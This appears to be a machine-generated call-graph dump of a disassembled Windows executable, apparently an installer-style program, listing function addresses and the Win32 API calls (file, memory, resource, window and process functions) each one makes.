6088->6089 6090 406f20 6089->6090 6092 403420 18 API calls 6089->6092 6091 4031e8 18 API calls 6090->6091 6091->6083 6092->6090 6135 406a58 6093->6135 6097 406a58 19 API calls 6099 406d36 6097->6099 6098 406d26 6098->6097 6100 406d72 6098->6100 6101 406d42 6099->6101 6103 406a34 21 API calls 6099->6103 6143 406888 6100->6143 6101->6100 6104 406d67 6101->6104 6107 406a58 19 API calls 6101->6107 6103->6101 6104->6100 6155 406cc8 GetWindowsDirectoryA 6104->6155 6109 406d5b 6107->6109 6108 406638 19 API calls 6110 406d87 6108->6110 6109->6104 6111 406a34 21 API calls 6109->6111 6112 40322c 4 API calls 6110->6112 6111->6104 6113 406d91 6112->6113 6114 4031b8 4 API calls 6113->6114 6115 406dab 6114->6115 6115->5977 6117 409244 6116->6117 6118 406638 19 API calls 6117->6118 6119 40925d 6118->6119 6120 40322c 4 API calls 6119->6120 6127 409268 6120->6127 6122 406978 20 API calls 6122->6127 6123 408dd8 18 API calls 6123->6127 6124 4033b4 18 API calls 6124->6127 6125 405890 18 API calls 6125->6127 6127->6122 6127->6123 6127->6124 6127->6125 6128 4092e4 6127->6128 6195 4091b0 6127->6195 6203 409034 6127->6203 6129 40322c 4 API calls 6128->6129 6130 4092ef 6129->6130 6131 4031b8 4 API calls 6130->6131 6132 409309 6131->6132 6133 403198 4 API calls 6132->6133 6134 409311 6133->6134 6134->5977 6136 4034f0 18 API calls 6135->6136 6137 406a6b 6136->6137 6138 406a82 GetEnvironmentVariableA 6137->6138 6142 406a95 6137->6142 6157 406dec 6137->6157 6138->6137 6139 406a8e 6138->6139 6141 403198 4 API calls 6139->6141 6141->6142 6142->6098 6152 406a34 6142->6152 6144 403414 6143->6144 6145 4068ab GetFullPathNameA 6144->6145 6146 4068b7 6145->6146 6147 4068ce 6145->6147 6146->6147 6148 4068bf 6146->6148 6149 40322c 4 API calls 6147->6149 6151 403278 18 API calls 6148->6151 6150 4068cc 6149->6150 6150->6108 6151->6150 6161 4069dc 6152->6161 6156 406ce9 6155->6156 6156->6100 6158 406dfa 6157->6158 6159 4034f0 18 API calls 6158->6159 6160 406e08 6159->6160 6160->6137 6168 406978 6161->6168 6163 4069fe 6164 406a06 GetFileAttributesA 6163->6164 6165 406a1b 6164->6165 6166 403198 4 API calls 6165->6166 6167 406a23 6166->6167 6167->6098 6178 406744 6168->6178 6170 4069b0 6173 4069c6 6170->6173 6174 4069bb 6170->6174 6172 406989 6172->6170 6185 406970 CharPrevA 6172->6185 6186 403454 6173->6186 6175 40322c 4 API calls 6174->6175 6177 4069c4 6175->6177 6177->6163 6181 406755 6178->6181 6179 4067b9 6180 406680 IsDBCSLeadByte 6179->6180 6182 4067b4 6179->6182 6180->6182 6181->6179 6184 406773 6181->6184 6182->6172 6184->6182 6193 406680 IsDBCSLeadByte 6184->6193 6185->6172 6187 403486 6186->6187 6188 403459 6186->6188 6189 403198 4 API calls 6187->6189 6188->6187 6191 40346d 6188->6191 6190 40347c 6189->6190 6190->6177 6192 403278 18 API calls 6191->6192 6192->6190 6194 406694 6193->6194 6194->6184 6196 403198 4 API calls 6195->6196 6198 4091d1 6196->6198 6200 4091fe 6198->6200 6212 4032a8 6198->6212 6215 403494 6198->6215 6201 403198 4 API calls 6200->6201 6202 409213 6201->6202 6202->6127 6204 408f70 2 API calls 6203->6204 6205 40904a 6204->6205 6206 40904e 6205->6206 6219 406a48 6205->6219 6206->6127 6209 409081 6210 408fac Wow64RevertWow64FsRedirection 6209->6210 6211 409089 6210->6211 6211->6127 6213 403278 18 API calls 6212->6213 6214 4032b5 6213->6214 6214->6198 6216 403498 6215->6216 6218 4034c3 6215->6218 6217 4034f0 18 API calls 6216->6217 6217->6218 6218->6198 6220 4069dc 21 API calls 6219->6220 6221 406a52 GetLastError 6220->6221 6221->6209 6223 406744 IsDBCSLeadByte 6222->6223 6225 406835 6223->6225 6224 40687f 6224->5991 6225->6224 6226 406680 IsDBCSLeadByte 6225->6226 6226->6225 6228 4068f3 6227->6228 6229 406820 IsDBCSLeadByte 6228->6229 6231 4068fe 6229->6231 6230 4066ea 6230->5996 6230->5997 6231->6230 6232 406680 IsDBCSLeadByte 6231->6232 6232->6231 6234 406957 6233->6234 6235 40695b 6233->6235 6234->6010 6238 406970 CharPrevA 6235->6238 6237 40696c 6237->6010 6238->6237 6813 408f30 6816 408dfc 6813->6816 6817 408e05 6816->6817 6818 403198 4 API calls 6817->6818 6819 408e13 6817->6819 6818->6817 6820 403932 6821 403924 6820->6821 6822 40374c VariantClear 6821->6822 6823 40392c 6822->6823 5383 4075c4 SetFilePointer 5384 4075f7 5383->5384 5385 4075e7 GetLastError 5383->5385 5385->5384 5386 4075f0 5385->5386 5388 40748c GetLastError 5386->5388 5391 4073ec 5388->5391 5392 407284 19 API calls 5391->5392 5393 407414 5392->5393 5394 407434 5393->5394 5395 405194 33 API calls 5393->5395 5396 405890 18 API calls 5394->5396 5395->5394 5397 407443 5396->5397 5398 403198 4 API calls 5397->5398 5399 407460 5398->5399 5399->5384 6414 4076c8 WriteFile 6415 4076e8 6414->6415 6416 4076ef 6414->6416 6417 40748c 35 API calls 6415->6417 6418 407700 6416->6418 6419 4073ec 34 API calls 6416->6419 6417->6416 6419->6418 6420 402ccc 6423 402cfe 6420->6423 6424 402cdd 6420->6424 6421 402d88 RtlUnwind 6422 403154 4 API calls 6421->6422 6422->6423 6424->6421 6424->6423 6425 402b28 RaiseException 6424->6425 6426 402d7f 6425->6426 6426->6421 6832 403fcd 6833 403f07 4 API calls 6832->6833 6834 403fd6 6833->6834 6835 403e9c 4 API calls 6834->6835 6836 403fe2 6835->6836 6433 4024d0 6434 4024e4 6433->6434 6435 4024e9 6433->6435 6438 401918 4 API calls 6434->6438 6436 402518 6435->6436 6437 40250e RtlEnterCriticalSection 6435->6437 6440 4024ed 6435->6440 6448 402300 6436->6448 6437->6436 6438->6435 6441 402525 6444 402581 6441->6444 6445 402577 RtlLeaveCriticalSection 6441->6445 6443 401fd4 14 API calls 6446 402531 6443->6446 6445->6444 6446->6441 6447 40215c 9 API calls 6446->6447 6447->6441 6449 402314 6448->6449 6451 402335 6449->6451 6452 4023b8 6449->6452 6450 402344 6450->6441 6450->6443 6451->6450 6454 401b74 9 API calls 6451->6454 6452->6450 6453 401d80 9 API calls 6452->6453 6456 402455 6452->6456 6458 401e84 6452->6458 6453->6452 6454->6450 6456->6450 6457 401d00 9 API calls 6456->6457 6457->6450 6463 401768 6458->6463 6460 401e99 6461 401ea6 6460->6461 6462 401dcc 9 API calls 6460->6462 6461->6452 6462->6461 6464 401787 6463->6464 6465 40183b 6464->6465 6466 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6464->6466 6467 40132c LocalAlloc 6464->6467 6469 401821 6464->6469 6471 4017d6 6464->6471 6468 4015c4 VirtualAlloc 6465->6468 6472 4017e7 6465->6472 6466->6464 6467->6464 6468->6472 6470 40150c VirtualFree 6469->6470 6470->6472 6473 40150c VirtualFree 6471->6473 6472->6460 6473->6472 6474 4028d2 6475 4028da 6474->6475 6476 403554 4 API calls 6475->6476 6477 4028ef 6475->6477 6476->6475 6478 4025ac 4 API calls 6477->6478 6479 4028f4 6478->6479 6837 4019d3 6838 4019ba 6837->6838 6839 4019c3 RtlLeaveCriticalSection 6838->6839 6840 4019cd 6838->6840 6839->6840 5400 407fd4 5401 407fe6 5400->5401 5403 407fed 5400->5403 5411 407f10 5401->5411 5405 408015 5403->5405 5406 408017 5403->5406 5409 408021 5403->5409 5404 40804e 5425 407e2c 5405->5425 5422 407d7c 5406->5422 5408 407d7c 33 API calls 5408->5404 5409->5404 5409->5408 5412 407f25 5411->5412 5413 407d7c 33 API calls 5412->5413 5414 407f34 5412->5414 5413->5414 5415 407f6e 5414->5415 5416 407d7c 33 API calls 5414->5416 5417 407f82 5415->5417 5418 407d7c 33 API calls 5415->5418 5416->5415 5421 407fae 5417->5421 5432 407eb8 5417->5432 5418->5417 5421->5403 5435 4058c4 5422->5435 5424 407d9e 5424->5409 5426 405194 33 API calls 5425->5426 5427 407e57 5426->5427 5443 407de4 5427->5443 5429 407e5f 5430 403198 4 API calls 5429->5430 5431 407e74 5430->5431 5431->5409 5433 407ec7 VirtualFree 5432->5433 5434 407ed9 VirtualAlloc 5432->5434 5433->5434 5434->5421 5437 4058d0 5435->5437 5436 405194 33 API calls 5438 4058fd 5436->5438 5437->5436 5439 4031e8 18 API calls 5438->5439 5440 405908 5439->5440 5441 403198 4 API calls 5440->5441 5442 40591d 5441->5442 5442->5424 5444 4058c4 33 API calls 5443->5444 5445 407e06 5444->5445 5445->5429 6480 405ad4 6481 405ae4 6480->6481 6482 405adc 6480->6482 6483 405ae2 6482->6483 6484 405aeb 6482->6484 6487 405a4c 6483->6487 6485 405940 19 API calls 6484->6485 6485->6481 6488 405a54 6487->6488 6489 405a6e 6488->6489 6492 403154 4 API calls 6488->6492 6490 405a73 6489->6490 6491 405a8a 6489->6491 6493 405940 19 API calls 6490->6493 6494 403154 4 API calls 6491->6494 6492->6488 6495 405a86 6493->6495 6496 405a8f 6494->6496 6498 403154 4 API calls 6495->6498 6497 4059b0 33 API calls 6496->6497 6497->6495 6499 405ab8 6498->6499 6500 403154 4 API calls 6499->6500 6501 405ac6 6500->6501 6501->6481 5913 40a9de 5914 40aa03 5913->5914 5915 407918 InterlockedExchange 5914->5915 5916 40aa2d 5915->5916 5917 40aa3d 5916->5917 5918 409ae8 18 API calls 5916->5918 5923 4076ac SetEndOfFile 5917->5923 5918->5917 5920 40aa59 5921 4025ac 4 API calls 5920->5921 5922 40aa90 5921->5922 5924 4076c3 5923->5924 5925 4076bc 5923->5925 5924->5920 5926 40748c 35 API calls 5925->5926 5926->5924 6844 402be9 RaiseException 6845 402c04 6844->6845 6512 402af2 6513 402afe 6512->6513 6516 402ed0 6513->6516 6517 403154 4 API calls 6516->6517 6519 402ee0 6517->6519 6518 402b03 6519->6518 6521 402b0c 6519->6521 6522 402b25 6521->6522 6523 402b15 RaiseException 6521->6523 6522->6518 6523->6522 5451 40a5f8 5494 4030dc 5451->5494 5453 40a60e 5497 4042e8 5453->5497 5455 40a613 5500 40457c GetModuleHandleA GetProcAddress 5455->5500 5459 40a61d 5508 4065c8 5459->5508 5461 40a622 5517 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5461->5517 5471 40a665 5539 406c2c 5471->5539 5472 4031e8 18 API calls 5473 40a683 5472->5473 5553 4074e0 5473->5553 5479 407918 InterlockedExchange 5482 40a6d2 5479->5482 5480 40a710 5573 4074a0 5480->5573 5482->5480 5610 409ae8 5482->5610 5483 40a751 5577 407a28 5483->5577 5484 40a736 5484->5483 5485 409ae8 18 API calls 5484->5485 5485->5483 5487 40a776 5587 408b08 5487->5587 5491 40a7bc 5492 408b08 35 API calls 5491->5492 5493 40a7f5 5491->5493 5492->5491 5620 403094 5494->5620 5496 4030e1 GetModuleHandleA GetCommandLineA 5496->5453 5498 403154 4 API calls 5497->5498 5499 404323 5497->5499 5498->5499 5499->5455 5501 404598 5500->5501 5502 40459f GetProcAddress 5500->5502 5501->5502 5503 4045b5 GetProcAddress 5502->5503 5504 4045ae 5502->5504 5505 4045c4 SetProcessDEPPolicy 5503->5505 5506 4045c8 5503->5506 5504->5503 5505->5506 5507 404624 6FDE1CD0 5506->5507 5507->5459 5621 405ca8 5508->5621 5518 4090f7 5517->5518 5705 406fa0 SetErrorMode 5518->5705 5521 407284 19 API calls 5522 409127 5521->5522 5523 403198 4 API calls 5522->5523 5524 40913c 5523->5524 5525 409b78 GetSystemInfo VirtualQuery 5524->5525 5526 409ba2 5525->5526 5527 409c2c 5525->5527 5526->5527 5528 409c0d VirtualQuery 5526->5528 5529 409bcc VirtualProtect 5526->5529 5530 409bfb VirtualProtect 5526->5530 5531 409768 5527->5531 5528->5526 5528->5527 5529->5526 5530->5528 5711 406bd0 GetCommandLineA 5531->5711 5533 409850 5534 4031b8 4 API calls 5533->5534 5536 40986a 5534->5536 5535 406c2c 20 API calls 5538 409785 5535->5538 5536->5471 5603 409c88 5536->5603 5537 403454 18 API calls 5537->5538 5538->5533 5538->5535 5538->5537 5540 406c53 GetModuleFileNameA 5539->5540 5541 406c77 GetCommandLineA 5539->5541 5542 403278 18 API calls 5540->5542 5549 406c7c 5541->5549 5543 406c75 5542->5543 5547 406ca4 5543->5547 5544 406c81 5545 403198 4 API calls 5544->5545 5548 406c89 5545->5548 5546 406af0 18 API calls 5546->5549 5550 403198 4 API calls 5547->5550 5551 40322c 4 API calls 5548->5551 5549->5544 5549->5546 5549->5548 5552 406cb9 5550->5552 5551->5547 5552->5472 5554 4074ea 5553->5554 5718 407576 5554->5718 5721 407578 5554->5721 5555 407516 5556 40752a 5555->5556 5557 40748c 35 API calls 5555->5557 5560 409c34 FindResourceA 5556->5560 5557->5556 5561 409c49 5560->5561 5562 409c4e SizeofResource 5560->5562 5563 409ae8 18 API calls 5561->5563 5564 409c60 LoadResource 5562->5564 5565 409c5b 5562->5565 5563->5562 5567 409c73 LockResource 5564->5567 5568 409c6e 5564->5568 5566 409ae8 18 API calls 5565->5566 5566->5564 5570 409c84 5567->5570 5571 409c7f 5567->5571 5569 409ae8 18 API calls 5568->5569 5569->5567 5570->5479 5570->5482 5572 409ae8 18 API calls 5571->5572 5572->5570 5574 4074b4 5573->5574 5575 4074c4 5574->5575 5576 4073ec 34 API calls 5574->5576 5575->5484 5576->5575 5578 407a35 5577->5578 5579 405890 18 API calls 5578->5579 5580 407a89 5578->5580 5579->5580 5581 407918 InterlockedExchange 5580->5581 5582 407a9b 5581->5582 5583 405890 18 API calls 5582->5583 5584 407ab1 5582->5584 5583->5584 5585 405890 18 API calls 5584->5585 5586 407af4 5584->5586 5585->5586 5586->5487 5591 408b82 5587->5591 5598 408b39 5587->5598 5588 408bcd 5724 407cb8 5588->5724 5590 408be4 5594 4031b8 4 API calls 5590->5594 5591->5588 5593 4034f0 18 API calls 5591->5593 5599 4031e8 18 API calls 5591->5599 5600 403420 18 API calls 5591->5600 5602 407cb8 35 API calls 5591->5602 5592 4034f0 18 API calls 5592->5598 5593->5591 5597 408bfe 5594->5597 5595 403420 18 API calls 5595->5598 5596 4031e8 18 API calls 5596->5598 5617 404c20 5597->5617 5598->5591 5598->5592 5598->5595 5598->5596 5601 407cb8 35 API calls 5598->5601 5599->5591 5600->5591 5601->5598 5602->5591 5604 40322c 4 API calls 5603->5604 5605 409cab 5604->5605 5606 409cba MessageBoxA 5605->5606 5607 409ccf 5606->5607 5608 403198 4 API calls 5607->5608 5609 409cd7 5608->5609 5609->5471 5611 409af1 5610->5611 5612 409b09 5610->5612 5613 405890 18 API calls 5611->5613 5614 405890 18 API calls 5612->5614 5616 409b03 5613->5616 5615 409b1a 5614->5615 5615->5480 5616->5480 5746 402594 5617->5746 5619 404c2b 5619->5491 5620->5496 5622 405940 19 API calls 5621->5622 5623 405cb9 5622->5623 5624 405280 GetSystemDefaultLCID 5623->5624 5628 4052b6 5624->5628 5625 404cdc 19 API calls 5625->5628 5626 40520c 19 API calls 5626->5628 5627 4031e8 18 API calls 5627->5628 5628->5625 5628->5626 5628->5627 5632 405318 5628->5632 5629 40520c 19 API calls 5629->5632 5630 4031e8 18 API calls 5630->5632 5631 404cdc 19 API calls 5631->5632 5632->5629 5632->5630 5632->5631 5633 40539b 5632->5633 5634 4031b8 4 API calls 5633->5634 5635 4053b5 5634->5635 5636 4053c4 GetSystemDefaultLCID 5635->5636 5693 40520c GetLocaleInfoA 5636->5693 5639 4031e8 18 API calls 5640 405404 5639->5640 5641 40520c 19 API calls 5640->5641 5642 405419 5641->5642 5643 40520c 19 API calls 5642->5643 5644 40543d 5643->5644 5699 405258 GetLocaleInfoA 5644->5699 5647 405258 GetLocaleInfoA 5648 40546d 5647->5648 5649 40520c 19 API calls 5648->5649 5650 405487 5649->5650 5651 405258 GetLocaleInfoA 5650->5651 5652 4054a4 5651->5652 5653 40520c 19 API calls 5652->5653 5654 4054be 5653->5654 5655 4031e8 18 API calls 5654->5655 5656 4054cb 5655->5656 5657 40520c 19 API calls 5656->5657 5658 4054e0 5657->5658 5659 4031e8 18 API calls 5658->5659 5660 4054ed 5659->5660 5661 405258 GetLocaleInfoA 5660->5661 5662 4054fb 5661->5662 5663 40520c 19 API calls 5662->5663 5664 405515 5663->5664 5665 4031e8 18 API calls 5664->5665 5666 405522 5665->5666 5667 40520c 19 API calls 5666->5667 5668 405537 5667->5668 5669 4031e8 18 API calls 5668->5669 5670 405544 5669->5670 5671 40520c 19 API calls 5670->5671 5672 405559 5671->5672 5673 405576 5672->5673 5674 405567 5672->5674 5676 40322c 4 API calls 5673->5676 5701 40322c 5674->5701 5677 405574 5676->5677 5678 40520c 19 API calls 5677->5678 5679 405598 5678->5679 5680 4055b5 5679->5680 5681 4055a6 5679->5681 5683 403198 4 API calls 5680->5683 5682 40322c 4 API calls 5681->5682 5684 4055b3 5682->5684 5683->5684 5685 4033b4 18 API calls 5684->5685 5686 4055d7 5685->5686 5687 4033b4 18 API calls 5686->5687 5688 4055f1 5687->5688 5689 4031b8 4 API calls 5688->5689 5690 40560b 5689->5690 5691 405cf4 GetVersionExA 5690->5691 5692 405d0b 5691->5692 5692->5461 5694 405233 5693->5694 5695 405245 5693->5695 5696 403278 18 API calls 5694->5696 5697 40322c 4 API calls 5695->5697 5698 405243 5696->5698 5697->5698 5698->5639 5700 405274 5699->5700 5700->5647 5703 403230 5701->5703 5702 403252 5702->5677 5703->5702 5704 4025ac 4 API calls 5703->5704 5704->5702 5709 403414 5705->5709 5708 406fee 5708->5521 5710 403418 LoadLibraryA 5709->5710 5710->5708 5712 406af0 18 API calls 5711->5712 5713 406bf3 5712->5713 5714 406c05 5713->5714 5715 406af0 18 API calls 5713->5715 5716 403198 4 API calls 5714->5716 5715->5713 5717 406c1a 5716->5717 5717->5538 5719 407578 5718->5719 5720 4075b7 CreateFileA 5719->5720 5720->5555 5722 403414 5721->5722 5723 4075b7 CreateFileA 5722->5723 5723->5555 5725 407cd3 5724->5725 5728 407cc8 5724->5728 5730 407c5c 5725->5730 5728->5590 5729 405890 18 API calls 5729->5728 5731 407c70 5730->5731 5732 407caf 5730->5732 5731->5732 5734 407bac 5731->5734 5732->5728 5732->5729 5735 407bb7 5734->5735 5736 407bc8 5734->5736 5737 405890 18 API calls 5735->5737 5738 4074a0 34 API calls 5736->5738 5737->5736 5739 407bdc 5738->5739 5740 4074a0 34 API calls 5739->5740 5741 407bfd 5740->5741 5742 407918 InterlockedExchange 5741->5742 5743 407c12 5742->5743 5744 407c28 5743->5744 5745 405890 18 API calls 5743->5745 5744->5731 5745->5744 5747 402598 5746->5747 5749 4025a2 5746->5749 5752 401fd4 5747->5752 5748 40259e 5748->5749 5750 403154 4 API calls 5748->5750 5749->5619 5749->5749 5750->5749 5753 401fe8 5752->5753 5754 401fed 5752->5754 5763 401918 RtlInitializeCriticalSection 5753->5763 5756 402012 RtlEnterCriticalSection 5754->5756 5757 40201c 5754->5757 5762 401ff1 5754->5762 5756->5757 5757->5762 5770 401ee0 5757->5770 5760 402147 5760->5748 5761 40213d RtlLeaveCriticalSection 5761->5760 5762->5748 5764 40193c RtlEnterCriticalSection 5763->5764 5765 401946 5763->5765 5764->5765 5766 401964 LocalAlloc 5765->5766 5767 40197e 5766->5767 5767->5767 5768 4019c3 RtlLeaveCriticalSection 5767->5768 5769 4019cd 5767->5769 5768->5769 5769->5754 5773 401ef0 5770->5773 5771 401f1c 5775 401f40 5771->5775 5781 401d00 5771->5781 5773->5771 5773->5775 5776 401e58 5773->5776 5775->5760 5775->5761 5785 4016d8 5776->5785 5779 401e75 5779->5773 5782 401d4e 5781->5782 5783 401d1e 5781->5783 5782->5783 5854 401c68 5782->5854 5783->5775 5788 4016f4 5785->5788 5787 4016fe 5810 4015c4 5787->5810 5788->5787 5790 40175b 5788->5790 5793 40174f 5788->5793 5802 401430 5788->5802 5814 40132c 5788->5814 5790->5779 5795 401dcc 5790->5795 5792 40170a 5792->5790 5818 40150c 5793->5818 5828 401d80 5795->5828 5798 40132c LocalAlloc 5800 401df0 5798->5800 5799 401df8 5799->5779 5800->5799 5832 401b44 5800->5832 5803 40143f VirtualAlloc 5802->5803 5805 40146c 5803->5805 5806 40148f 5803->5806 5822 4012e4 5805->5822 5806->5788 5809 40147c VirtualFree 5809->5806 5812 40160a 5810->5812 5811 40163a 5811->5792 5812->5811 5813 401626 VirtualAlloc 5812->5813 5813->5811 5813->5812 5815 401348 5814->5815 5816 4012e4 LocalAlloc 5815->5816 5817 40138f 5816->5817 5817->5788 5821 40153b 5818->5821 5819 401594 5819->5790 5820 401568 VirtualFree 5820->5821 5821->5819 5821->5820 5825 40128c 5822->5825 5826 401298 LocalAlloc 5825->5826 5827 4012aa 5825->5827 5826->5827 5827->5806 5827->5809 5829 401d89 5828->5829 5831 401d92 5828->5831 5829->5831 5837 401b74 5829->5837 5831->5798 5833 401b61 5832->5833 5834 401b52 5832->5834 5833->5799 5835 401d00 9 API calls 5834->5835 5836 401b5f 5835->5836 5836->5799 5840 40215c 5837->5840 5839 401b95 5839->5831 5841 40217a 5840->5841 5842 402175 5840->5842 5844 4021ab RtlEnterCriticalSection 5841->5844 5846 40217e 5841->5846 5852 4021b5 5841->5852 5843 401918 4 API calls 5842->5843 5843->5841 5844->5852 5845 4021c1 5848 4022e3 RtlLeaveCriticalSection 5845->5848 5849 4022ed 5845->5849 5846->5839 5847 402244 5847->5846 5850 401d80 7 API calls 5847->5850 5848->5849 5849->5839 5850->5846 5851 402270 5851->5845 5853 401d00 7 API calls 5851->5853 5852->5845 5852->5847 5852->5851 5853->5845 5855 401c7a 5854->5855 5856 401c9d 5855->5856 5857 401caf 5855->5857 5867 40188c 5856->5867 5859 40188c 3 API calls 5857->5859 5860 401cad 5859->5860 5861 401b44 9 API calls 5860->5861 5866 401cc5 5860->5866 5862 401cd4 5861->5862 5863 401cee 5862->5863 5877 401b98 5862->5877 5882 4013a0 5863->5882 5866->5783 5868 4018b2 5867->5868 5876 40190b 5867->5876 5886 401658 5868->5886 5871 40132c LocalAlloc 5872 4018cf 5871->5872 5873 40150c VirtualFree 5872->5873 5874 4018e6 5872->5874 5873->5874 5875 4013a0 LocalAlloc 5874->5875 5874->5876 5875->5876 5876->5860 5878 401bab 5877->5878 5879 401b9d 5877->5879 5878->5863 5880 401b74 9 API calls 5879->5880 5881 401baa 5880->5881 5881->5863 5883 4013ab 5882->5883 5884 4013c6 5883->5884 5885 4012e4 LocalAlloc 5883->5885 5884->5866 5885->5884 5888 40168f 5886->5888 5887 4016cf 5887->5871 5888->5887 5889 4016a9 VirtualFree 5888->5889 5889->5888 6846 402dfa 6847 402e0d 6846->6847 6849 402e26 6846->6849 6850 402ba4 6847->6850 6851 402bc9 6850->6851 6852 402bad 6850->6852 6851->6849 6853 402bb5 RaiseException 6852->6853 6853->6851 6854 4075fa GetFileSize 6855 407626 6854->6855 6856 407616 GetLastError 6854->6856 6856->6855 6857 40761f 6856->6857 6858 40748c 35 API calls 6857->6858 6858->6855 6859 406ffb 6860 407008 SetErrorMode 6859->6860 6528 403a80 CloseHandle 6529 403a90 6528->6529 6530 403a91 GetLastError 6528->6530 6531 404283 6532 4042c3 6531->6532 6533 403154 4 API calls 6532->6533 6534 404323 6533->6534 6861 404185 6862 4041ff 6861->6862 6863 4041cc 6862->6863 6864 403154 4 API calls 6862->6864 6865 404323 6864->6865 6535 403e87 6536 403e4c 6535->6536 6537 403e62 6536->6537 6538 403e7b 6536->6538 6541 403e67 6536->6541 6544 403cc8 6537->6544 6539 402674 4 API calls 6538->6539 6542 403e78 6539->6542 6541->6542 6548 402674 6541->6548 6545 403cd6 6544->6545 6546 402674 4 API calls 6545->6546 6547 403ceb 6545->6547 6546->6547 6547->6541 6549 403154 4 API calls 6548->6549 6550 40267a 6549->6550 6550->6542 6559 407e90 6560 407eb8 VirtualFree 6559->6560 6561 407e9d 6560->6561 6564 403e95 6565 403e4c 6564->6565 6566 403e62 6565->6566 6567 403e7b 6565->6567 6570 403e67 6565->6570 6569 403cc8 4 API calls 6566->6569 6568 402674 4 API calls 6567->6568 6571 403e78 6568->6571 6569->6570 6570->6571 6572 402674 4 API calls 6570->6572 6572->6571 6573 40ac97 6582 4096fc 6573->6582 6576 40aca1 6578 403198 4 API calls 6576->6578 6577 402f24 5 API calls 6577->6576 6579 40acc0 6578->6579 6580 403198 4 API calls 6579->6580 6581 40acc8 6580->6581 6591 4056ac 6582->6591 6584 409745 6587 403198 4 API calls 6584->6587 6585 409717 6585->6584 6597 40720c 6585->6597 6589 40975a 6587->6589 6588 409735 6590 40973d MessageBoxA 6588->6590 6589->6576 6589->6577 6590->6584 6592 403154 4 API calls 6591->6592 6594 4056b1 6592->6594 6593 4056c9 6593->6585 6594->6593 6595 403154 4 API calls 6594->6595 6596 4056bf 6595->6596 6596->6585 6598 4056ac 4 API calls 6597->6598 6599 40721b 6598->6599 6600 407221 6599->6600 6603 40722f 6599->6603 6601 40322c 4 API calls 6600->6601 6602 40722d 6601->6602 6602->6588 6604 40724b 6603->6604 6605 40723f 6603->6605 6615 4032b8 6604->6615 6608 4071d0 6605->6608 6609 40322c 4 API calls 6608->6609 6610 4071df 6609->6610 6611 4071fc 6610->6611 6612 406950 CharPrevA 6610->6612 6611->6602 6613 4071eb 6612->6613 6613->6611 6614 4032fc 18 API calls 6613->6614 6614->6611 6616 403278 18 API calls 6615->6616 6617 4032c2 6616->6617 6617->6602 6618 403a97 6619 403aac 6618->6619 6620 403ab2 6619->6620 6621 403bbc GetStdHandle 6619->6621 6622 403b0e CreateFileA 6619->6622 6623 403c17 GetLastError 6621->6623 6635 403bba 6621->6635 6622->6623 6624 403b2c 6622->6624 6623->6620 6625 403b3b GetFileSize 6624->6625 6624->6635 6625->6623 6627 403b4e SetFilePointer 6625->6627 6627->6623 6631 403b6a ReadFile 6627->6631 6628 403be7 GetFileType 6628->6620 6630 403c02 CloseHandle 6628->6630 6630->6620 6631->6623 6632 403b8c 6631->6632 6633 403b9f SetFilePointer 6632->6633 6632->6635 6633->6623 6634 403bb0 SetEndOfFile 6633->6634 6634->6623 6634->6635 6635->6620 6635->6628 6640 40aaa2 6641 40aad2 6640->6641 6642 40aadc CreateWindowExA SetWindowLongA 6641->6642 6643 405194 33 API calls 6642->6643 6644 40ab5f 6643->6644 6645 4032fc 18 API calls 6644->6645 6646 40ab6d 6645->6646 6647 4032fc 18 API calls 6646->6647 6648 40ab7a 6647->6648 6649 406b7c 19 API calls 6648->6649 6650 40ab86 6649->6650 6651 4032fc 18 API calls 6650->6651 6652 40ab8f 6651->6652 6653 4099ec 43 API calls 6652->6653 6654 40aba1 6653->6654 6655 4098cc 19 API calls 6654->6655 6656 40abb4 6654->6656 6655->6656 6657 40abed 6656->6657 6658 4094d8 9 API calls 6656->6658 6659 40ac06 6657->6659 6662 40ac00 RemoveDirectoryA 6657->6662 6658->6657 6660 40ac1a 6659->6660 6661 40ac0f DestroyWindow 6659->6661 6663 40ac42 6660->6663 6664 40357c 4 API calls 6660->6664 6661->6660 6662->6659 6665 40ac38 6664->6665 6666 4025ac 4 API calls 6665->6666 6666->6663 6878 405ba2 6880 405ba4 6878->6880 6879 405be0 6881 405940 19 API calls 6879->6881 6880->6879 6882 405bf7 6880->6882 6883 405bda 6880->6883 6891 405bf3 6881->6891 6886 404cdc 19 API calls 6882->6886 6883->6879 6884 405c4c 6883->6884 6885 4059b0 33 API calls 6884->6885 6885->6891 6887 405c20 6886->6887 6889 4059b0 33 API calls 6887->6889 6888 403198 4 API calls 6890 405c86 6888->6890 6889->6891 6891->6888 6892 408da4 6893 408dc8 6892->6893 6894 408c80 18 API calls 6893->6894 6895 408dd1 6894->6895 6667 402caa 6668 403154 4 API calls 6667->6668 6669 402caf 6668->6669 6910 4011aa 6911 4011ac GetStdHandle 6910->6911 6670 4028ac 6671 402594 18 API calls 6670->6671 6672 4028b6 6671->6672 4982 40aab4 4983 40aab8 SetLastError 4982->4983 5014 409648 GetLastError 4983->5014 4986 40aad2 4988 40aadc CreateWindowExA SetWindowLongA 4986->4988 5027 405194 4988->5027 4992 40ab6d 4993 4032fc 18 API calls 4992->4993 4994 40ab7a 4993->4994 5044 406b7c GetCommandLineA 4994->5044 4997 4032fc 18 API calls 4998 40ab8f 4997->4998 5049 4099ec 4998->5049 5000 40aba1 5002 40abb4 5000->5002 5070 4098cc 5000->5070 5003 40abd4 5002->5003 5004 40abed 5002->5004 5076 4094d8 5003->5076 5006 40ac06 5004->5006 5009 40ac00 RemoveDirectoryA 5004->5009 5007 40ac1a 5006->5007 5008 40ac0f DestroyWindow 5006->5008 5013 40ac42 5007->5013 5084 40357c 5007->5084 5008->5007 5009->5006 5011 40ac38 5097 4025ac 5011->5097 5101 404c94 5014->5101 5022 4096c3 5116 4031b8 5022->5116 5028 4051a8 33 API calls 5027->5028 5029 4051a3 5028->5029 5030 4032fc 5029->5030 5031 403300 5030->5031 5032 40333f 5030->5032 5033 4031e8 5031->5033 5034 40330a 5031->5034 5032->4992 5040 403254 18 API calls 5033->5040 5041 4031fc 5033->5041 5035 403334 5034->5035 5036 40331d 5034->5036 5037 4034f0 18 API calls 5035->5037 5277 4034f0 5036->5277 5043 403322 5037->5043 5038 403228 5038->4992 5040->5041 5041->5038 5042 4025ac 4 API calls 5041->5042 5042->5038 5043->4992 5303 406af0 5044->5303 5046 406ba1 5047 403198 4 API calls 5046->5047 5048 406bbf 5047->5048 5048->4997 5317 4033b4 5049->5317 5051 409a27 5052 409a59 CreateProcessA 5051->5052 5053 409a65 5052->5053 5054 409a6c CloseHandle 5052->5054 5055 409648 35 API calls 